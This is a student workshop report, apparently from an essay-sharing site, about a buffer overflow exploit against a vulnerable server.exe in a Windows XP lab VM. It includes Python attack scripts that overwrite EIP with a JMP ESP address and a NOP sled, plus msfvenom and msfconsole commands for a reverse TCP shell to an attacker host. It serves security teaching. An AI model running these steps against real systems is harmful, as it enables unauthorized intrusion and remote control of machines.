Exploit Development Workshop: Analyzing Vulnerabilities in Windows XP

Verified

Added on 2023/06/05

AI Summary

This document outlines a workshop on exploit development, utilizing Kali Linux and Windows XP virtual machines in a NAT network configuration. The process involves using Kali Linux to create an attack script (attack.py) and executing it against a Windows XP machine running a vulnerable server.exe, debugged with Immunity Debugger. The workshop details steps for identifying and weaponizing vulnerabilities, including finding the EIP offset, identifying a JMP ESP address, and crafting shellcode using Metasploit. The final stage involves exploiting the vulnerability to gain a reverse TCP shell on the Windows XP machine, demonstrating a practical approach to exploit development and ethical hacking.

Running head: WORKSHOP – EXPLOIT DEVELOPMENT
Workshop – Exploit Development
Name of the Student
Name of the University
Author’s Note

Paraphrase This Document

Need a fresh take? Get an instant paraphrase of this document with our AI Paraphraser

1
WORKSHOP – EXPLOIT DEVELOPMENT
For the preparation of the workshop two virtual machine is setup in VmWare i.e. Kali Linux and
Windows XP and for both the machines the network configuration is set to NAT. The configuration
NAT enables the private IP to be connected with the internet and enable communication. The IP
address are checked for enabling communication between the machines and on the windows machine
the immunity debugger is opened for running the python script and loading the server.exe and
executed.
Then in the next step the kali linux is used for creating a file using the vi editor and is named as
attack.py. The code given in the workshop is inserted in the file that is given below:
#!/usr/bin/python
import sys
import os
import socket
host = sys.argv[1]
port = int(sys.argv[2])
# Testing
buffer = "\x41"*500
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con = s.connect((host, port))
s.send(buffer)
s.close()
The command “python attack.py 192.168.0.57 1337” is executed for proceeding with the attack. The
IP address used is the IP address of the windows host. In the windows machine the keys shift + F9 is
pressed for passing the exception and execution of the code. A sample result is found that is given in

2
WORKSHOP – EXPLOIT DEVELOPMENT
the following screenshot where the EIP values changes to the value used by the attacker and it is also
similar for the EBP value.
The ESP is used for pointing to a certain region of memory and it contains the value that is injected by
the attacker.
For weaponizing the vulnerability the immunity debugger is used and the server .exe is restarted and
the execution is started. In the command line interface of the kali linux machine the following
command “cd /usr/share/metasploit-framework/tools/exploit”is used for entering into the metasploit
framework. The command “./pattern_create.rb -l 5000 | nc IP_ADDRESS 1337” is executed within
Kali linux for getting the access of the windows host machine. On the other hand ialeun the windows
the shift + F9 is pressed for adding the exception and the result is viewed for the identification of the
EIP value. For the determination of the offset value of the EIP the command “ ./pattern_offset.rb -l
5000 -q 37694136” is used and the returned result is noted. For the given case it is 260 and depending
on this the address for the code is determined that jumps to the ESP. The ESP is used for the
representation of the pointer for a memory for the management of the control. The server.exe is
restarted by pressing the CTRL + F2 and F9 is pressed after starting the immunity debugger. For
viewing the executable modules ALT+ E is pressed in the windows virtual machine. A searching is
done for the JMP ESP and if the result contains GDI 32 the memory address is noted. The attack code
in the kali linux machine is modified according to the workshop and the commands is:
#!/usr/bin/python

3
WORKSHOP – EXPLOIT DEVELOPMENT
import sys
import os
import socket
host = sys.argv[1]
port = int(sys.argv[2])
# EIP is overwritten at 260 bytes
buffer = "\x41"*260
# Overwrite EIP with JMP ESP
buffer += "\x78\x16\xF3\x77"
# NOPSLED
buffer += "\x90"*128
# Shellcode
buffer +=
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con = s.connect((host, port))
s.send(buffer)
s.close()
The command “msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.2 -e x86/shikata_ga_nai
-b '\x00\xff\x0a\x0b\x0d' -i 3 -f python” is used and exploitation is performed. For the exploitation the
code msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set
LHOST 192.168.0.2; exploit" is used and on the windows client the immunity debugger is closed.

Paraphrase This Document

Need a fresh take? Get an instant paraphrase of this document with our AI Paraphraser

4
WORKSHOP – EXPLOIT DEVELOPMENT
The modified python code is executed wit the IP address of the client for the completion of the
workshop.
Bibliography
Cyber Security - CII ICT East 2017 | Ethical Hacking India | Ethical Hacking Institutes In India |
Ethical Hacking Courses | Ethical Hacking Course In Kolkata - ISOEH. (2018). Isoeh.com.
Retrieved 21 September 2018, from https://www.isoeh.com/CII-ICT-East-2017-cyber-
security.html
Definitions, E., & Hope, C. (2018). What is Ethical Hacking and an Ethical
Hacker?. Computerhope.com. Retrieved 21 September 2018, from
https://www.computerhope.com/jargon/e/ethihack.htm
Ethical Hacking - Computing and Software Wiki. (2018). Wiki.cas.mcmaster.ca. Retrieved 21
September 2018, from http://wiki.cas.mcmaster.ca/index.php/Ethical_Hacking
Ethical Hacking - ICT Issue. (2018). Sikandar's E-Portfolio. Retrieved 21 September 2018, from
https://sikandarbttportfolio.weebly.com/ethical-hacking---ict-issue.html
Freeman, R. (2016). Ethical hacking: what is it, and why would I need it?. IT Governance Blog.
Retrieved 21 September 2018, from https://www.itgovernance.co.uk/blog/ethical-hacking-
what-is-it-and-why-would-i-need-it/
What is ethical hacker? - Definition from WhatIs.com. (2018). SearchSecurity. Retrieved 21
September 2018, from https://searchsecurity.techtarget.com/definition/ethical-hacker